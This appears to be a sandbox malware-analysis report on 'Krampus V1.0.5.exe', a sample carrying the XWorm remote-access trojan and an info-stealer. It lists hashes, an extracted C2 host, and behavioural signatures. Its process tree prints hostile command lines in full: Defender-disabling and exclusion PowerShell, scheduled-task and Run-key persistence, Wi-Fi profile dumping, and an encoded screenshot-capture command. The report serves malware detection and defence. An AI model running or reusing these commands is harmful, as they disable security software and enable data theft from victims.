Analysis
-
max time kernel
1798s -
max time network
1806s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-04-2024 15:52
Static task
static1
Behavioral task
behavioral1
Sample
Krampus V1.0.5.exe
Resource
win7-20240221-en
General
-
Target
Krampus V1.0.5.exe
-
Size
7.4MB
-
MD5
6cfc075819c99a2c6515729392b9ba02
-
SHA1
c6224ff71c43b6ae461d9ad870da5002a4e8bd5e
-
SHA256
a98d837ed01480f717df0d2f47021b757b8093469134f321cbd1e1a4c6fb8f5c
-
SHA512
7ee09e6c429f010a2e74170dcc0bc7c984fb436cbdf8eedba5c48eb8b82f68338aad9e5293b93438b191afd0d22277db0befb2f0c9d8392365bebeea209b53b6
-
SSDEEP
98304:NSc0SbSMt+dnz8JjHWxJHRLIHzcrmpliRYOeTjcIJ1IlhlWu8hK87N7Ceg6H08Bi:gMt+dnIdHWxdKHoYOeXRihlWu8YgoP/
Malware Config
Extracted
xworm
yet-musicians.gl.at.ply.gg:27619
-
Install_directory
%Userprofile%
-
install_file
discord.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\test.exe family_xworm behavioral2/memory/1840-140-0x00000000004C0000-0x00000000004E8000-memory.dmp family_xworm -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeBuilt.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
test.exeKrampus V1.0.5.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation test.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Krampus V1.0.5.exe -
Drops startup file 2 IoCs
Processes:
test.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk test.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk test.exe -
Executes dropped EXE 33 IoCs
Processes:
Built.exeBuilt.exetest.exerar.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exediscord.exepid process 4988 Built.exe 2280 Built.exe 1840 test.exe 4672 rar.exe 4476 discord.exe 688 discord.exe 5336 discord.exe 716 discord.exe 2168 discord.exe 4068 discord.exe 4896 discord.exe 3532 discord.exe 3092 discord.exe 2424 discord.exe 1104 discord.exe 1492 discord.exe 5016 discord.exe 5040 discord.exe 3068 discord.exe 1520 discord.exe 3844 discord.exe 2436 discord.exe 5636 discord.exe 1592 discord.exe 2124 discord.exe 5032 discord.exe 2916 discord.exe 5448 discord.exe 4960 discord.exe 4048 discord.exe 5220 discord.exe 5504 discord.exe 4580 discord.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid process 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe 2280 Built.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI49882\python311.dll upx behavioral2/memory/2280-94-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_ctypes.pyd upx behavioral2/memory/2280-104-0x00007FFBFF580000-0x00007FFBFF5A4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\libffi-8.dll upx behavioral2/memory/2280-122-0x00007FFC00050000-0x00007FFC0005F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_sqlite3.pyd upx behavioral2/memory/1624-123-0x00000212ED050000-0x00000212ED060000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49882\libcrypto-3.dll upx behavioral2/memory/2280-147-0x00007FFC00530000-0x00007FFC0055D000-memory.dmp upx behavioral2/memory/2280-151-0x00007FFC07670000-0x00007FFC07689000-memory.dmp upx behavioral2/memory/2280-152-0x00007FFBFF8D0000-0x00007FFBFF8F3000-memory.dmp upx behavioral2/memory/2280-153-0x00007FFBFAA20000-0x00007FFBFAB96000-memory.dmp upx behavioral2/memory/2280-156-0x00007FFC004B0000-0x00007FFC004C9000-memory.dmp upx behavioral2/memory/2280-159-0x00007FFBFF890000-0x00007FFBFF8C3000-memory.dmp upx behavioral2/memory/2280-157-0x00007FFC07640000-0x00007FFC0764D000-memory.dmp upx behavioral2/memory/2280-163-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx behavioral2/memory/2280-164-0x00007FFBEB650000-0x00007FFBEB71D000-memory.dmp upx behavioral2/memory/2280-166-0x00007FFBEB120000-0x00007FFBEB649000-memory.dmp upx behavioral2/memory/2280-170-0x00007FFBFF870000-0x00007FFBFF884000-memory.dmp upx behavioral2/memory/2280-175-0x00007FFBFF860000-0x00007FFBFF86D000-memory.dmp upx behavioral2/memory/2280-176-0x00007FFBEB000000-0x00007FFBEB11C000-memory.dmp upx behavioral2/memory/2280-168-0x00007FFBFF580000-0x00007FFBFF5A4000-memory.dmp upx behavioral2/memory/2280-281-0x00007FFC004B0000-0x00007FFC004C9000-memory.dmp upx behavioral2/memory/2280-286-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx behavioral2/memory/2280-287-0x00007FFBFF580000-0x00007FFBFF5A4000-memory.dmp upx behavioral2/memory/2280-314-0x00007FFBFF890000-0x00007FFBFF8C3000-memory.dmp upx behavioral2/memory/2280-316-0x00007FFBEB650000-0x00007FFBEB71D000-memory.dmp upx behavioral2/memory/2280-317-0x00007FFBEB120000-0x00007FFBEB649000-memory.dmp upx behavioral2/memory/2280-449-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx behavioral2/memory/2280-450-0x00007FFBFF580000-0x00007FFBFF5A4000-memory.dmp upx behavioral2/memory/2280-455-0x00007FFBFAA20000-0x00007FFBFAB96000-memory.dmp upx behavioral2/memory/2280-520-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx behavioral2/memory/2280-521-0x00007FFBFF580000-0x00007FFBFF5A4000-memory.dmp upx behavioral2/memory/2280-534-0x00007FFBFAA20000-0x00007FFBFAB96000-memory.dmp upx behavioral2/memory/2280-549-0x00007FFBE5ED0000-0x00007FFBE64C0000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
Krampus V1.0.5.exetest.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test = "C:\\Windows\\System32\\test.exe" Krampus V1.0.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\discord.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test = "C:\\Windows\\System32\\test.bat" Krampus V1.0.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\Windows\\System32\\Built.exe" Krampus V1.0.5.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com 43 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
Krampus V1.0.5.exedescription ioc process File created C:\Windows\System32\test.bat Krampus V1.0.5.exe File opened for modification C:\Windows\System32\test.bat Krampus V1.0.5.exe File created C:\Windows\System32\Built.exe Krampus V1.0.5.exe File opened for modification C:\Windows\System32\Built.exe Krampus V1.0.5.exe File created C:\Windows\System32\test.exe Krampus V1.0.5.exe File opened for modification C:\Windows\System32\test.exe Krampus V1.0.5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2168 schtasks.exe 452 schtasks.exe 1572 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 5240 tasklist.exe 2620 tasklist.exe 884 tasklist.exe 4044 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5688 taskkill.exe 5928 taskkill.exe 5640 taskkill.exe 4992 taskkill.exe 5360 taskkill.exe 3436 taskkill.exe 2756 taskkill.exe 2908 taskkill.exe 4704 taskkill.exe 3564 taskkill.exe 5772 taskkill.exe 1184 taskkill.exe 216 taskkill.exe 4028 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetest.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1956 powershell.exe 1956 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 4092 powershell.exe 4092 powershell.exe 1776 powershell.exe 1776 powershell.exe 2580 powershell.exe 2580 powershell.exe 4092 powershell.exe 2580 powershell.exe 1776 powershell.exe 1776 powershell.exe 5308 powershell.exe 5308 powershell.exe 5316 powershell.exe 5316 powershell.exe 5316 powershell.exe 5308 powershell.exe 6004 powershell.exe 6004 powershell.exe 6004 powershell.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe 1840 test.exe 1840 test.exe 6128 powershell.exe 6128 powershell.exe 5084 powershell.exe 5084 powershell.exe 4036 powershell.exe 4036 powershell.exe 1764 powershell.exe 1764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Krampus V1.0.5.exepowershell.exepowershell.exepowershell.exetest.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2320 Krampus V1.0.5.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1840 test.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeDebugPrivilege 4044 tasklist.exe Token: SeDebugPrivilege 884 tasklist.exe Token: SeIncreaseQuotaPrivilege 5232 WMIC.exe Token: SeSecurityPrivilege 5232 WMIC.exe Token: SeTakeOwnershipPrivilege 5232 WMIC.exe Token: SeLoadDriverPrivilege 5232 WMIC.exe Token: SeSystemProfilePrivilege 5232 WMIC.exe Token: SeSystemtimePrivilege 5232 WMIC.exe Token: SeProfSingleProcessPrivilege 5232 WMIC.exe Token: SeIncBasePriorityPrivilege 5232 WMIC.exe Token: SeCreatePagefilePrivilege 5232 WMIC.exe Token: SeBackupPrivilege 5232 WMIC.exe Token: SeRestorePrivilege 5232 WMIC.exe Token: SeShutdownPrivilege 5232 WMIC.exe Token: SeDebugPrivilege 5232 WMIC.exe Token: SeSystemEnvironmentPrivilege 5232 WMIC.exe Token: SeRemoteShutdownPrivilege 5232 WMIC.exe Token: SeUndockPrivilege 5232 WMIC.exe Token: SeManageVolumePrivilege 5232 WMIC.exe Token: 33 5232 WMIC.exe Token: 34 5232 WMIC.exe Token: 35 5232 WMIC.exe Token: 36 5232 WMIC.exe Token: SeDebugPrivilege 5240 tasklist.exe Token: SeIncreaseQuotaPrivilege 5232 WMIC.exe Token: SeSecurityPrivilege 5232 WMIC.exe Token: SeTakeOwnershipPrivilege 5232 WMIC.exe Token: SeLoadDriverPrivilege 5232 WMIC.exe Token: SeSystemProfilePrivilege 5232 WMIC.exe Token: SeSystemtimePrivilege 5232 WMIC.exe Token: SeProfSingleProcessPrivilege 5232 WMIC.exe Token: SeIncBasePriorityPrivilege 5232 WMIC.exe Token: SeCreatePagefilePrivilege 5232 WMIC.exe Token: SeBackupPrivilege 5232 WMIC.exe Token: SeRestorePrivilege 5232 WMIC.exe Token: SeShutdownPrivilege 5232 WMIC.exe Token: SeDebugPrivilege 5232 WMIC.exe Token: SeSystemEnvironmentPrivilege 5232 WMIC.exe Token: SeRemoteShutdownPrivilege 5232 WMIC.exe Token: SeUndockPrivilege 5232 WMIC.exe Token: SeManageVolumePrivilege 5232 WMIC.exe Token: 33 5232 WMIC.exe Token: 34 5232 WMIC.exe Token: 35 5232 WMIC.exe Token: 36 5232 WMIC.exe Token: SeDebugPrivilege 5316 powershell.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 6004 powershell.exe Token: SeDebugPrivilege 2620 tasklist.exe Token: SeDebugPrivilege 5804 powershell.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 2756 taskkill.exe Token: SeDebugPrivilege 1184 taskkill.exe Token: SeDebugPrivilege 216 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
test.exepid process 1840 test.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Krampus V1.0.5.exeBuilt.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2320 wrote to memory of 1956 2320 Krampus V1.0.5.exe powershell.exe PID 2320 wrote to memory of 1956 2320 Krampus V1.0.5.exe powershell.exe PID 2320 wrote to memory of 2960 2320 Krampus V1.0.5.exe cmd.exe PID 2320 wrote to memory of 2960 2320 Krampus V1.0.5.exe cmd.exe PID 2320 wrote to memory of 640 2320 Krampus V1.0.5.exe powershell.exe PID 2320 wrote to memory of 640 2320 Krampus V1.0.5.exe powershell.exe PID 2320 wrote to memory of 2168 2320 Krampus V1.0.5.exe schtasks.exe PID 2320 wrote to memory of 2168 2320 Krampus V1.0.5.exe schtasks.exe PID 2320 wrote to memory of 4988 2320 Krampus V1.0.5.exe Built.exe PID 2320 wrote to memory of 4988 2320 Krampus V1.0.5.exe Built.exe PID 2320 wrote to memory of 1624 2320 Krampus V1.0.5.exe cmd.exe PID 2320 wrote to memory of 1624 2320 Krampus V1.0.5.exe cmd.exe PID 4988 wrote to memory of 2280 4988 Built.exe Built.exe PID 4988 wrote to memory of 2280 4988 Built.exe Built.exe PID 2320 wrote to memory of 452 2320 Krampus V1.0.5.exe schtasks.exe PID 2320 wrote to memory of 452 2320 Krampus V1.0.5.exe schtasks.exe PID 2320 wrote to memory of 1840 2320 Krampus V1.0.5.exe test.exe PID 2320 wrote to memory of 1840 2320 Krampus V1.0.5.exe test.exe PID 2280 wrote to memory of 448 2280 Built.exe cmd.exe PID 2280 wrote to memory of 448 2280 Built.exe cmd.exe PID 2280 wrote to memory of 3220 2280 Built.exe cmd.exe PID 2280 wrote to memory of 3220 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2300 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2300 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2124 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2124 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2660 2280 Built.exe cmd.exe PID 2280 wrote to memory of 2660 2280 Built.exe cmd.exe PID 448 wrote to memory of 1776 448 cmd.exe powershell.exe PID 448 wrote to memory of 1776 448 cmd.exe powershell.exe PID 3220 wrote to memory of 4092 3220 cmd.exe powershell.exe PID 3220 wrote to memory of 4092 3220 cmd.exe powershell.exe PID 2300 wrote to memory of 2580 2300 cmd.exe powershell.exe PID 2300 wrote to memory of 2580 2300 cmd.exe powershell.exe PID 2280 wrote to memory of 3816 2280 Built.exe cmd.exe PID 2280 wrote to memory of 3816 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4472 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4472 2280 Built.exe cmd.exe PID 2280 wrote to memory of 1084 2280 Built.exe cmd.exe PID 2280 wrote to memory of 1084 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4548 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4548 2280 Built.exe cmd.exe PID 2280 wrote to memory of 1672 2280 Built.exe Conhost.exe PID 2280 wrote to memory of 1672 2280 Built.exe Conhost.exe PID 2280 wrote to memory of 3784 2280 Built.exe cmd.exe PID 2280 wrote to memory of 3784 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4080 2280 Built.exe cmd.exe PID 2280 wrote to memory of 4080 2280 Built.exe cmd.exe PID 2280 wrote to memory of 904 2280 Built.exe cmd.exe PID 2280 wrote to memory of 904 2280 Built.exe cmd.exe PID 2124 wrote to memory of 884 2124 cmd.exe tasklist.exe PID 2124 wrote to memory of 884 2124 cmd.exe tasklist.exe PID 2660 wrote to memory of 4044 2660 cmd.exe tasklist.exe PID 2660 wrote to memory of 4044 2660 cmd.exe tasklist.exe PID 4548 wrote to memory of 5176 4548 cmd.exe Conhost.exe PID 4548 wrote to memory of 5176 4548 cmd.exe Conhost.exe PID 3816 wrote to memory of 5232 3816 cmd.exe WMIC.exe PID 3816 wrote to memory of 5232 3816 cmd.exe WMIC.exe PID 1672 wrote to memory of 5264 1672 cmd.exe netsh.exe PID 1672 wrote to memory of 5264 1672 cmd.exe netsh.exe PID 4080 wrote to memory of 5272 4080 cmd.exe systeminfo.exe PID 4080 wrote to memory of 5272 4080 cmd.exe systeminfo.exe PID 3784 wrote to memory of 5252 3784 cmd.exe reg.exe PID 3784 wrote to memory of 5252 3784 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 5888 attrib.exe 2196 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Krampus V1.0.5.exe"C:\Users\Admin\AppData\Local\Temp\Krampus V1.0.5.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\test.bat'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\System32\test.bat" "2⤵PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2168
-
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:1084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4472
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:5176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:5264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG